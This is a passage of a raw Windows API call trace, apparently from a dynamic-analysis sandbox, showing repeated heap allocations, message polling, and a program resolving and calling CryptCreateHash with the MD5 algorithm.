RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0166.815] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0166.816] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0166.816] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.816] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.816] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0166.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0166.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.817] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0166.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0166.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0166.818] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.818] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0166.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0166.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0166.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0166.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0166.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0166.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0166.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0166.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0166.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0166.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0166.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0166.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0166.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0166.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0166.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0166.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x9bd408, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0166.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.823] GetProcAddress (hModule=0x74f20000, lpProcName="CryptCreateHash") returned 0x74f2df4e [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0166.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0166.823] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0166.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0166.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0166.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0166.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0166.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0166.825] 